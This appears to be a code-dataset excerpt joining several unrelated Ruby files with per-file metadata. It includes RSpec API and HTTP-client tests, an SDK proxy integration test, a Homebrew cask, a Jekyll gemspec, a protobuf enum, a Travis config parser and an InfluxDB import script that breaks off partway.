header 'User-Token', nil
project = FactoryGirl.create(:project)
post "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with expired user token' do
before do
admin.user_tokens.first.update(expires: DateTime.now - 1.day)
header 'User-Token', admin.user_tokens.first.token
project = FactoryGirl.create(:project)
post "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with invalid user token' do
before do
header 'User-Token', 'asdfasdfasdfasdf'
project = FactoryGirl.create(:project)
post "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with user already on team' do
before do
header 'User-Token', admin.user_tokens.first.token
project = team.projects.first
post "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'a bad request'
end
end
describe 'remove user from team' do
context 'as an admin' do
before do
other_team = FactoryGirl.create(:team)
user = other_team.users.first
@team_count = other_team.users.count
header 'User-Token', admin.user_tokens.first.token
delete "/teams/#{other_team.id}/user/#{user.id}"
end
it 'responds succesfully', :show_in_doc do
expect(last_response.status).to eq 200
expect(json).to include('team')
end
it 'should add user to team' do
expect(json).to include('team')
expect(json['team']).to include('users')
expect(json['team']['users'].count).to eq (@team_count -1)
end
end
context 'as a non-admin' do
before do
header 'User-Token', user.user_tokens.first.token
user = FactoryGirl.create(:user)
delete "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'a forbidden request'
end
context 'with invalid team id' do
before do
header 'User-Token', admin.user_tokens.first.token
user = team.users.first
delete "/teams/-1/user/#{user.id}"
end
it_behaves_like 'a not found request'
end
context 'with invalid user id' do
before do
header 'User-Token', admin.user_tokens.first.token
user = team.users.first
delete "/teams/#{team.id}/user/-1"
end
it_behaves_like 'a not found request'
end
context 'without user token' do
before do
header 'User-Token', nil
user = team.users.first
delete "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with expired user token' do
before do
admin.user_tokens.first.update(expires: DateTime.now - 1.day)
header 'User-Token', admin.user_tokens.first.token
user = team.users.first
delete "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with invalid user token' do
before do
header 'User-Token', 'asdfasdfasdfasdf'
user = team.users.first
delete "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with user not on team' do
before do
header 'User-Token', admin.user_tokens.first.token
user = FactoryGirl.create(:user)
delete "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'a bad request'
end
end
describe 'remove project from team' do
context 'as an admin' do
before do
other_team = FactoryGirl.create(:team)
project = other_team.projects.first
@team_count = other_team.projects.count
header 'User-Token', admin.user_tokens.first.token
delete "/teams/#{other_team.id}/project/#{project.id}"
end
it 'responds succesfully', :show_in_doc do
expect(last_response.status).to eq 200
expect(json).to include('team')
end
it 'should add user to team' do
expect(json).to include('team')
expect(json['team']).to include('projects')
expect(json['team']['projects'].count).to eq (@team_count -1)
end
end
context 'as a non-admin' do
before do
header 'User-Token', user.user_tokens.first.token
project = team.projects.first
delete "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'a forbidden request'
end
context 'with invalid team id' do
before do
header 'User-Token', admin.user_tokens.first.token
project = team.projects.first
delete "/teams/-1/project/#{project.id}"
end
it_behaves_like 'a not found request'
end
context 'with invalid project id' do
before do
header 'User-Token', admin.user_tokens.first.token
project = team.projects.first
delete "/teams/#{team.id}/project/-1"
end
it_behaves_like 'a not found request'
end
context 'without user token' do
before do
header 'User-Token', nil
project = team.projects.first
delete "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with expired user token' do
before do
admin.user_tokens.first.update(expires: DateTime.now - 1.day)
header 'User-Token', admin.user_tokens.first.token
project = team.projects.first
delete "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with invalid user token' do
before do
header 'User-Token', 'asdfasdfasdfasdf'
project = team.projects.first
delete "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with project not on team' do
before do
header 'User-Token', admin.user_tokens.first.token
project = FactoryGirl.create(:project)
delete "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'a bad request'
end
end
end
| 26.337617 | 166 | 0.615702 |
392d43ef2d44f38bd1d0c73f7549ae3f2ffea6ba | 865 | # frozen_string_literal: true
require 'spec_helper'
describe 'admin/application_settings/integrations.html.haml' do
let(:app_settings) { build(:application_setting) }
describe 'sourcegraph integration' do
let(:sourcegraph_flag) { true }
before do
assign(:application_setting, app_settings)
allow(Gitlab::Sourcegraph).to receive(:feature_available?).and_return(sourcegraph_flag)
end
context 'when sourcegraph feature is enabled' do
it 'show the form' do
render
expect(rendered).to have_field('application_setting_sourcegraph_enabled')
end
end
context 'when sourcegraph feature is disabled' do
let(:sourcegraph_flag) { false }
it 'show the form' do
render
expect(rendered).not_to have_field('application_setting_sourcegraph_enabled')
end
end
end
end
| 24.714286 | 93 | 0.708671 |
e22b8ce1e615ec44411c13afebfff5f3c5b27859 | 12,559 | require 'spec_helper'
describe Typhoeus::Request do
let(:url) { "http://www.google.com" }
let(:options) { {} }
let(:request) { Typhoeus::Request.new(url, options) }
describe "#inspect" do
let(:url) { "http://www.google.com" }
let(:options) do
{ :body => "a=1&b=2",
:params => { :c => 'ok' },
:method => :get,
:headers => { 'Content-Type' => 'text/html' } }
end
it "dumps out the URI" do
request.inspect.should match(/http:\/\/www\.google\.com/)
end
it "dumps out the body" do
request.inspect.should match(/a=1&b=2/)
end
it "dumps params" do
request.inspect.should match(/:c\s*=>\s*"ok"/)
end
it "dumps the method" do
request.inspect.should match(/:get/)
end
it "dumps out headers" do
request.inspect.should match(/"Content-Type"\s*=>\s*"text\/html"/)
end
end
describe "#marshal_dump" do
let(:url) { "http://www.google.com" }
['on_complete', 'after_complete'].each do |name|
context "when #{name} handler" do
before { request.instance_variable_set("@#{name}", Proc.new{}) }
it "doesn't include @#{name}" do
request.send(:marshal_dump).map(&:first).should_not include("@#{name}")
end
it "doesn't raise when dumped" do
expect { Marshal.dump(request) }.to_not raise_error
end
context "when loading" do
let(:loaded) { Marshal.load(Marshal.dump(request)) }
it "includes url" do
loaded.url.should eq(request.url)
end
it "doesn't include #{name}" do
loaded.send(name).should be_nil
end
end
end
end
end
describe "#localhost?" do
["localhost", "127.0.0.1", "0.0.0.0"].each do |host|
context "when host is #{host}" do
let(:url) { "http://#{host}" }
it "returns true" do
request.should be_localhost
end
end
end
context "when host is other" do
let(:url) { "http://www.google.com" }
it "return true" do
request.should_not be_localhost
end
end
end
describe "#params_string" do
context "when keys are strings" do
let(:options) do
{ :params => {
'b' => 'fdsa',
'a' => 'jlk',
'c' => '789' } }
end
it "returns string" do
request.params_string.should be_a(String)
end
it "sorts keys" do
request.params_string.should eq("a=jlk&b=fdsa&c=789")
end
end
context "when keys are symbols" do
let(:options) do
{ :params => {
:b => 'fdsa',
:a => 'jlk',
:c => '789' } }
end
it "returns string" do
request.params_string.should be_a(String)
end
it "sorts keys" do
request.params_string.should eq("a=jlk&b=fdsa&c=789")
end
end
context "when value is array" do
context "when key has no brackets" do
let(:options) { { :params => { 'a' => ['1', '2'] } } }
it "translates correct" do
request.params_string.should eq("a=1&a=2")
end
end
context "when key has brackets" do
let(:options) { { :params => { 'a[]' => ['1', '2'] } } }
it "translates correct" do
request.params_string.should eq("a%5B%5D=1&a%5B%5D=2")
end
end
end
context "when value is hash" do
let(:options) { { :params => { :a => { :b => { :c => :d } } } } }
it "translates correct" do
request.params_string.should eq("a%5Bb%5D%5Bc%5D=d")
end
end
context "when value is hash with nested array" do
let(:options) { { :params => { :a => { :b => { :c => ['d','e'] } } } } }
it "translates correct" do
request.params_string.should eq("a%5Bb%5D%5Bc%5D=d&a%5Bb%5D%5Bc%5D=e")
end
end
end
describe "quick request methods" do
it "can run a GET synchronously" do
response = Typhoeus::Request.get("http://localhost:3000", :params => {:q => "hi"}, :headers => {:foo => "bar"})
response.code.should == 200
JSON.parse(response.body)["REQUEST_METHOD"].should == "GET"
end
it "can run a POST synchronously" do
response = Typhoeus::Request.post("http://localhost:3000", :params => {:q => { :a => "hi" } }, :headers => {:foo => "bar"})
response.code.should == 200
json = JSON.parse(response.body)
json["REQUEST_METHOD"].should == "POST"
json["rack.request.form_hash"]["q"]["a"].should == "hi"
end
it "can run a PUT synchronously" do
response = Typhoeus::Request.put("http://localhost:3000", :params => {:q => "hi"}, :headers => {:foo => "bar"})
response.code.should == 200
JSON.parse(response.body)["REQUEST_METHOD"].should == "PUT"
end
it "can run a DELETE synchronously" do
response = Typhoeus::Request.delete("http://localhost:3000", :params => {:q => "hi"}, :headers => {:foo => "bar"})
response.code.should == 200
JSON.parse(response.body)["REQUEST_METHOD"].should == "DELETE"
end
end
describe ".new" do
it "takes url as the first argument" do
Typhoeus::Request.new("http://localhost:3000").url.should == "http://localhost:3000"
end
it "should parse the host from the url" do
Typhoeus::Request.new("http://localhost:3000/whatever?hi=foo").host.should == "http://localhost:3000"
Typhoeus::Request.new("http://localhost:3000?hi=foo").host.should == "http://localhost:3000"
Typhoeus::Request.new("http://localhost:3000").host.should == "http://localhost:3000"
end
it "takes method as an option" do
Typhoeus::Request.new("http://localhost:3000", :method => :get).method.should == :get
end
it "takes headers as an option" do
headers = {:foo => :bar}
request = Typhoeus::Request.new("http://localhost:3000", :headers => headers)
request.headers.should == headers
end
it "takes params as an option and adds them to the url" do
Typhoeus::Request.new("http://localhost:3000", :params => {:foo => "bar"}).url.should == "http://localhost:3000?foo=bar"
end
it "takes request body as an option" do
Typhoeus::Request.new("http://localhost:3000", :body => "whatever").body.should == "whatever"
end
it "takes timeout as an option" do
Typhoeus::Request.new("http://localhost:3000", :timeout => 10).timeout.should == 10
end
it "accepts a string for the timeout option" do
Typhoeus::Request.new("http://localhost:3000", :timeout => "150").timeout.should == 150
end
it "doesn't convert a nil timeout to an integer" do
Typhoeus::Request.new("http://localhost:3000", :timeout => nil).timeout.should_not == nil.to_i
end
it "doesn't convert an empty timeout to an integer" do
Typhoeus::Request.new("http://localhost:3000", :timeout => "").timeout.should_not == "".to_i
end
it "takes connect_timeout as an option" do
Typhoeus::Request.new("http://localhost:3000", :connect_timeout => 14).connect_timeout.should == 14
end
it "accepts a string for the connect_timeout option" do
Typhoeus::Request.new("http://localhost:3000", :connect_timeout => "420").connect_timeout.should == 420
end
it "doesn't convert a nil connect_timeout to an integer" do
Typhoeus::Request.new("http://localhost:3000", :connect_timeout => nil).connect_timeout.should_not == nil.to_i
end
it "doesn't convert an empty connect_timeout to an integer" do
Typhoeus::Request.new("http://localhost:3000", :connect_timeout => "").connect_timeout.should_not == "".to_i
end
it "takes cache_timeout as an option" do
Typhoeus::Request.new("http://localhost:3000", :cache_timeout => 60).cache_timeout.should == 60
end
it "accepts a string for the cache_timeout option" do
Typhoeus::Request.new("http://localhost:3000", :cache_timeout => "42").cache_timeout.should == 42
end
it "doesn't convert a nil cache_timeout to an integer" do
Typhoeus::Request.new("http://localhost:3000", :cache_timeout => nil).cache_timeout.should_not == nil.to_i
end
it "doesn't convert an empty cache_timeout to an integer" do
Typhoeus::Request.new("http://localhost:3000", :cache_timeout => "").cache_timeout.should_not == "".to_i
end
it "takes follow_location as an option" do
Typhoeus::Request.new("http://localhost:3000", :follow_location => true).follow_location.should == true
end
it "takes max_redirects as an option" do
Typhoeus::Request.new("http://localhost:3000", :max_redirects => 10).max_redirects.should == 10
end
it "has the associated response object" do
request = Typhoeus::Request.new("http://localhost:3000")
request.response = :foo
request.response.should == :foo
end
it "has an on_complete handler that is called when the request is completed" do
request = Typhoeus::Request.new("http://localhost:3000")
foo = nil
request.on_complete do |response|
foo = response
end
request.response = :bar
request.call_handlers
foo.should == :bar
end
it "has an on_complete setter" do
foo = nil
proc = Proc.new {|response| foo = response}
request = Typhoeus::Request.new("http://localhost:3000")
request.on_complete = proc
request.response = :bar
request.call_handlers
foo.should == :bar
end
it "stores the handled response that is the return value from the on_complete block" do
request = Typhoeus::Request.new("http://localhost:3000")
request.on_complete do |response|
"handled"
end
request.response = :bar
request.call_handlers
request.handled_response.should == "handled"
end
it "has an after_complete handler that recieves what on_complete returns" do
request = Typhoeus::Request.new("http://localhost:3000")
request.on_complete do |response|
"handled"
end
good = nil
request.after_complete do |object|
good = object == "handled"
end
request.call_handlers
good.should be_true
end
it "has an after_complete setter" do
request = Typhoeus::Request.new("http://localhost:3000")
request.on_complete do |response|
"handled"
end
good = nil
proc = Proc.new {|object| good = object == "handled"}
request.after_complete = proc
request.call_handlers
good.should be_true
end
describe "time info" do
it "should have time" do
response = Typhoeus::Request.get("http://localhost:3000")
response.time.should > 0
end
it "should have connect time" do
response = Typhoeus::Request.get("http://localhost:3000")
response.connect_time.should > 0
end
it "should have app connect time" do
response = Typhoeus::Request.get("http://localhost:3000")
response.app_connect_time.should > 0
end
it "should have start transfer time" do
response = Typhoeus::Request.get("http://localhost:3000")
response.start_transfer_time.should > 0
end
it "should have pre-transfer time" do
response = Typhoeus::Request.get("http://localhost:3000")
response.pretransfer_time.should > 0
end
end
describe 'cache_key_basis' do
it 'should allow overriding the cache key basis' do
req1 = Typhoeus::Request.new('http://localhost:3000')
req2 = Typhoeus::Request.new('http://localhost:3000')
req2.cache_key_basis = 'localhost'
req1.cache_key.should_not == req2.cache_key
end
end
describe "authentication" do
it "should allow to set username and password" do
auth = { :username => 'foo', :password => 'bar' }
e = Typhoeus::Request.get(
"http://localhost:3001/auth_basic/#{auth[:username]}/#{auth[:password]}",
auth
)
e.code.should == 200
end
it "should allow to set authentication method" do
auth = {
:username => 'username',
:password => 'password',
:auth_method => :ntlm
}
e = Typhoeus::Request.get(
"http://localhost:3001/auth_ntlm",
auth
)
e.code.should == 200
end
end
end
describe "retry" do
it "should take a retry option"
it "should count the number of times a request has failed"
end
end
| 30.857494 | 129 | 0.601242 |
18e256f71cc111a6bb0bdea2420ba80a597b0476 | 3,755 | require 'spec_helper'
require 'integration_setup'
require 'ingenico/connect/sdk/factory'
require 'ingenico/connect/sdk/communicator_configuration'
require 'ingenico/connect/sdk/proxy_configuration'
require 'ingenico/connect/sdk/communication_exception'
require 'ingenico/connect/sdk/merchant/services/convert_amount_params'
require 'ingenico/connect/sdk/merchant/services/services_client'
require 'webrick'
require 'webrick/httpproxy'
describe 'proxies' do
context 'using proxy server' do
proxy_server = nil
password_filename = 'password_file'
before :context do
WebMock.allow_net_connect!
# set up a proxy
proxy_server = Thread.new do
config = { Realm: 'testing' }
htpasswd = WEBrick::HTTPAuth::Htpasswd.new(password_filename) # create new Apache password file
proxy_configuration = Integration.init_communicator_configuration(Integration::PROPERTIES_URI_PROXY).proxy_configuration
htpasswd.set_passwd config[:Realm], proxy_configuration.username, proxy_configuration.password
config[:UserDB] = htpasswd
basic_auth = WEBrick::HTTPAuth::ProxyBasicAuth.new(config)
auth_handler = Proc.new do |req, res|
basic_auth.authenticate(req, res)
end
proxy = WEBrick::HTTPProxyServer.new(Port: 9999, ProxyVia: false,
ProxyAuthProc: auth_handler)
Signal.trap('INT') do
proxy.shutdown
end
proxy.start
end
sleep 1 # wait for the proxy server
end
after :context do
Thread.kill(proxy_server)
File.delete(password_filename)
WebMock.disable_net_connect!
end
# NOTE: if this test is running for a long time with no response
# check https://eu.sandbox.api-ingenico.com because this is where merchant
# connects to.
it 'can be connected to' do
request = Ingenico::Connect::SDK::Merchant::Services::ConvertAmountParams.new
request.amount = 123
request.source = 'USD'
request.target = 'EUR'
Integration.init_client(true) do |client|
services = client.merchant(Integration::MERCHANT_ID).services
services.convert_amount(request)
expect(services).to be_an_instance_of(Ingenico::Connect::SDK::Merchant::Services::ServicesClient)
end
end
# test that connecting to a nonexistent proxy will raise an error
it 'should be connected to if possible' do
yaml = YAML.load_file(Integration::PROPERTIES_URI_PROXY)
config = Ingenico::Connect::SDK::CommunicatorConfiguration.new(properties: yaml, connect_timeout: 0.5, socket_timeout: 0.5,
authorization_type: 'v1HMAC',
api_key_id: Integration::API_KEY_ID,
secret_api_key: Integration::SECRET_API_KEY,
proxy_configuration: Ingenico::Connect::SDK::ProxyConfiguration.new(host: 'localhost',
port: 65535,
username: 'arg',
password: 'blarg'))
begin
client = Ingenico::Connect::SDK::Factory.create_client_from_configuration(config)
expect{client.merchant(Integration::MERCHANT_ID).services.testconnection}.to raise_error(Ingenico::Connect::SDK::CommunicationException)
ensure
client.close unless client.nil?
end
end
end # end of using proxy server
end
| 41.263736 | 144 | 0.619973 |
798fbd6b90cd92b94a8557a0235606d581b91f75 | 457 | cask 'cuttle' do
version '1.1'
sha256 '7133beb24c3a37fe13f12d0b8110f1fcaf541d80e938cfaafb37a4d47bfcca15'
url "https://github.com/oakmac/cuttle/releases/download/v#{version}/cuttle-v#{version}-mac.dmg"
appcast 'https://github.com/Swordfish90/cool-retro-term/releases.atom',
checkpoint: 'eb9ed3cb84563876d607d15d5d262e750d5d9210b6ee8ea1621ea0e261b0c646'
name 'CUTTLE'
homepage 'https://github.com/oakmac/cuttle'
app 'Cuttle.app'
end
| 35.153846 | 97 | 0.774617 |
5d8ef1f0ec53f0b9963bafcb92bda1393a5b325d | 773 | module Coconductor
module ProjectFiles
class CodeOfConductFile < Coconductor::ProjectFiles::ProjectFile
include Licensee::ContentHelper
EXTENSIONS = %w[md markdown txt].freeze
EXT_REGEX = /\.#{Regexp.union(EXTENSIONS)}/i.freeze
BASENAME_REGEX = /(citizen[_-])?code[_-]of[_-]conduct/i.freeze
# LANG_REGEX must contain extension to avoid matching .md as the lang
LANG_REGEX = /(\.(?<lang>[a-z]{2}(-[a-z]{2})?)#{EXT_REGEX})?/i.freeze
FILENAME_REGEX = /#{BASENAME_REGEX}#{LANG_REGEX}#{EXT_REGEX}?/i.freeze
def self.name_score(filename)
filename =~ /\A#{FILENAME_REGEX}/ ? 1.0 : 0.0
end
def possible_matchers
[Matchers::Exact, Matchers::Dice, Matchers::FieldAware]
end
end
end
end
| 33.608696 | 76 | 0.654592 |
385a3e7fc515b91864805d02e00c1266e2d86779 | 7,282 | # -*- encoding: utf-8 -*-
# stub: github-pages 204 ruby lib
Gem::Specification.new do |s|
s.name = "github-pages".freeze
s.version = "204"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["GitHub, Inc.".freeze]
s.date = "2020-01-24"
s.description = "Bootstrap the GitHub Pages Jekyll environment locally.".freeze
s.email = "[email protected]".freeze
s.executables = ["github-pages".freeze]
s.files = ["bin/github-pages".freeze]
s.homepage = "https://github.com/github/pages-gem".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.3.0".freeze)
s.rubygems_version = "3.1.2".freeze
s.summary = "Track GitHub Pages dependencies.".freeze
s.installed_by_version = "3.1.2" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<jekyll>.freeze, ["= 3.8.5"])
s.add_runtime_dependency(%q<jekyll-sass-converter>.freeze, ["= 1.5.2"])
s.add_runtime_dependency(%q<kramdown>.freeze, ["= 1.17.0"])
s.add_runtime_dependency(%q<jekyll-commonmark-ghpages>.freeze, ["= 0.1.6"])
s.add_runtime_dependency(%q<liquid>.freeze, ["= 4.0.3"])
s.add_runtime_dependency(%q<rouge>.freeze, ["= 3.13.0"])
s.add_runtime_dependency(%q<github-pages-health-check>.freeze, ["= 1.16.1"])
s.add_runtime_dependency(%q<jekyll-redirect-from>.freeze, ["= 0.15.0"])
s.add_runtime_dependency(%q<jekyll-sitemap>.freeze, ["= 1.4.0"])
s.add_runtime_dependency(%q<jekyll-feed>.freeze, ["= 0.13.0"])
s.add_runtime_dependency(%q<jekyll-gist>.freeze, ["= 1.5.0"])
s.add_runtime_dependency(%q<jekyll-paginate>.freeze, ["= 1.1.0"])
s.add_runtime_dependency(%q<jekyll-coffeescript>.freeze, ["= 1.1.1"])
s.add_runtime_dependency(%q<jekyll-seo-tag>.freeze, ["= 2.6.1"])
s.add_runtime_dependency(%q<jekyll-github-metadata>.freeze, ["= 2.13.0"])
s.add_runtime_dependency(%q<jekyll-avatar>.freeze, ["= 0.7.0"])
s.add_runtime_dependency(%q<jekyll-remote-theme>.freeze, ["= 0.4.1"])
s.add_runtime_dependency(%q<jemoji>.freeze, ["= 0.11.1"])
s.add_runtime_dependency(%q<jekyll-mentions>.freeze, ["= 1.5.1"])
s.add_runtime_dependency(%q<jekyll-relative-links>.freeze, ["= 0.6.1"])
s.add_runtime_dependency(%q<jekyll-optional-front-matter>.freeze, ["= 0.3.2"])
s.add_runtime_dependency(%q<jekyll-readme-index>.freeze, ["= 0.3.0"])
s.add_runtime_dependency(%q<jekyll-default-layout>.freeze, ["= 0.1.4"])
s.add_runtime_dependency(%q<jekyll-titles-from-headings>.freeze, ["= 0.5.3"])
s.add_runtime_dependency(%q<jekyll-swiss>.freeze, ["= 1.0.0"])
s.add_runtime_dependency(%q<minima>.freeze, ["= 2.5.1"])
s.add_runtime_dependency(%q<jekyll-theme-primer>.freeze, ["= 0.5.4"])
s.add_runtime_dependency(%q<jekyll-theme-architect>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-cayman>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-dinky>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-hacker>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-leap-day>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-merlot>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-midnight>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-minimal>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-modernist>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-slate>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-tactile>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-time-machine>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<mercenary>.freeze, ["~> 0.3"])
s.add_runtime_dependency(%q<nokogiri>.freeze, [">= 1.10.4", "< 2.0"])
s.add_runtime_dependency(%q<terminal-table>.freeze, ["~> 1.4"])
s.add_development_dependency(%q<jekyll_test_plugin_malicious>.freeze, ["~> 0.2"])
s.add_development_dependency(%q<pry>.freeze, ["~> 0.10"])
s.add_development_dependency(%q<rspec>.freeze, ["~> 3.3"])
s.add_development_dependency(%q<rubocop-github>.freeze, ["= 0.14.0"])
else
s.add_dependency(%q<jekyll>.freeze, ["= 3.8.5"])
s.add_dependency(%q<jekyll-sass-converter>.freeze, ["= 1.5.2"])
s.add_dependency(%q<kramdown>.freeze, ["= 1.17.0"])
s.add_dependency(%q<jekyll-commonmark-ghpages>.freeze, ["= 0.1.6"])
s.add_dependency(%q<liquid>.freeze, ["= 4.0.3"])
s.add_dependency(%q<rouge>.freeze, ["= 3.13.0"])
s.add_dependency(%q<github-pages-health-check>.freeze, ["= 1.16.1"])
s.add_dependency(%q<jekyll-redirect-from>.freeze, ["= 0.15.0"])
s.add_dependency(%q<jekyll-sitemap>.freeze, ["= 1.4.0"])
s.add_dependency(%q<jekyll-feed>.freeze, ["= 0.13.0"])
s.add_dependency(%q<jekyll-gist>.freeze, ["= 1.5.0"])
s.add_dependency(%q<jekyll-paginate>.freeze, ["= 1.1.0"])
s.add_dependency(%q<jekyll-coffeescript>.freeze, ["= 1.1.1"])
s.add_dependency(%q<jekyll-seo-tag>.freeze, ["= 2.6.1"])
s.add_dependency(%q<jekyll-github-metadata>.freeze, ["= 2.13.0"])
s.add_dependency(%q<jekyll-avatar>.freeze, ["= 0.7.0"])
s.add_dependency(%q<jekyll-remote-theme>.freeze, ["= 0.4.1"])
s.add_dependency(%q<jemoji>.freeze, ["= 0.11.1"])
s.add_dependency(%q<jekyll-mentions>.freeze, ["= 1.5.1"])
s.add_dependency(%q<jekyll-relative-links>.freeze, ["= 0.6.1"])
s.add_dependency(%q<jekyll-optional-front-matter>.freeze, ["= 0.3.2"])
s.add_dependency(%q<jekyll-readme-index>.freeze, ["= 0.3.0"])
s.add_dependency(%q<jekyll-default-layout>.freeze, ["= 0.1.4"])
s.add_dependency(%q<jekyll-titles-from-headings>.freeze, ["= 0.5.3"])
s.add_dependency(%q<jekyll-swiss>.freeze, ["= 1.0.0"])
s.add_dependency(%q<minima>.freeze, ["= 2.5.1"])
s.add_dependency(%q<jekyll-theme-primer>.freeze, ["= 0.5.4"])
s.add_dependency(%q<jekyll-theme-architect>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-cayman>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-dinky>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-hacker>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-leap-day>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-merlot>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-midnight>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-minimal>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-modernist>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-slate>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-tactile>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-time-machine>.freeze, ["= 0.1.1"])
s.add_dependency(%q<mercenary>.freeze, ["~> 0.3"])
s.add_dependency(%q<nokogiri>.freeze, [">= 1.10.4", "< 2.0"])
s.add_dependency(%q<terminal-table>.freeze, ["~> 1.4"])
s.add_dependency(%q<jekyll_test_plugin_malicious>.freeze, ["~> 0.2"])
s.add_dependency(%q<pry>.freeze, ["~> 0.10"])
s.add_dependency(%q<rspec>.freeze, ["~> 3.3"])
s.add_dependency(%q<rubocop-github>.freeze, ["= 0.14.0"])
end
end
| 58.725806 | 112 | 0.660258 |
01461f1a295fcf9298dc7efdafda643b5aef3dd4 | 1,116 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v3/errors/size_limit_error.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/ads/googleads/v3/errors/size_limit_error.proto", :syntax => :proto3) do
add_message "google.ads.googleads.v3.errors.SizeLimitErrorEnum" do
end
add_enum "google.ads.googleads.v3.errors.SizeLimitErrorEnum.SizeLimitError" do
value :UNSPECIFIED, 0
value :UNKNOWN, 1
value :REQUEST_SIZE_LIMIT_EXCEEDED, 2
value :RESPONSE_SIZE_LIMIT_EXCEEDED, 3
end
end
end
module Google
module Ads
module GoogleAds
module V3
module Errors
SizeLimitErrorEnum = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.errors.SizeLimitErrorEnum").msgclass
SizeLimitErrorEnum::SizeLimitError = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.errors.SizeLimitErrorEnum.SizeLimitError").enummodule
end
end
end
end
end
| 34.875 | 182 | 0.750896 |
b993de26981e232293ae6866db4ef203ecd69443 | 1,456 | # frozen_string_literal: true
require 'oj'
require 'travis/yml/web/helpers'
module Travis
module Yml
module Web
class Parse < Sinatra::Base
include Helpers
MIME_TYPE = 'application/vnd.travis-ci.configs+json'
post '/parse' do
handle
end
post '/v1/parse' do
handle
end
private
def handle
status 200
json Parse::Config.new(load).to_h
rescue Yml::InputError => e
status 400
error(e)
end
def load
Travis::Yml.load(configs? ? configs : [config], opts)
end
def configs?
env['CONTENT_TYPE'] == MIME_TYPE
end
def config
Parts::Part.new(request_body)
end
def configs
Oj.load(request_body).map do |part|
config, source, mode = part.values_at(*%w(config source merge_mode))
key = source == 'api' ? :rgt : :lft
Parts::Part.new(config, source, key => mode)
end
end
def opts
keys = OPTS.keys.map(&:to_s) & params.keys
symbolize(keys.map { |key| [key, params[key.to_s] == 'true'] }.to_h)
end
def symbolize(hash)
hash.map { |key, value| [key.to_sym, value] }.to_h
end
end
end
end
end
require 'travis/yml/web/parse/config'
| 22.060606 | 82 | 0.506868 |
bba889b5a1d816ad0a209a079b3317a7893e3214 | 4,161 | require 'nokogiri'
require 'open-uri'
require 'influxdb'
username = ENV['wltp_adminuser']
password = ENV['wltp_adminpass']
jenkins_user = ENV['wltp_adminuser']
jenkins_pass = ENV['wltp_adminpass']
database = 'test'
singlestats = 'd'
fullstats = 'z'
time_precision = 'ns'
influxdb = InfluxDB::Client.new database,
username: username,
password: password
#@doc = Nokogiri::XML(open('http://localhost:8080/job/Test/api/xml', :http_basic_authentication => [jenkins_user,jenkins_pass]))
dbs = influxdb.list_databases
dbcreated = false
for i in 0..dbs.length - 1
name = dbs[i]["name"]
if name == database
dbcreated = true
end
end
if dbcreated == false
influxdb.create_database(database)
end
for i in 137..155
if i.between?(141,148)
next
end
stats = Hash.new
timestamp = 0
cat = ""
totaltime = 0
totalfailures = 0
totaltests = 0
for j in 1..29
#puts i.to_s + " - " + j.to_s
if j == 17
next
end
@doc = Nokogiri::XML(File.read("../1/#{j}_#{i}.xml"))
#puts "time: " + @doc.xpath("//testsuite/@time").text
testtime = @doc.xpath("//testsuite/@time").text
totaltime = totaltime + testtime.to_f()
#puts "name: " + @doc.xpath("//testsuite/@name").text
testname = @doc.xpath("//testsuite/@name").text
#puts "categories: " + @doc.xpath("//property[@name = 'categories']/@value").text
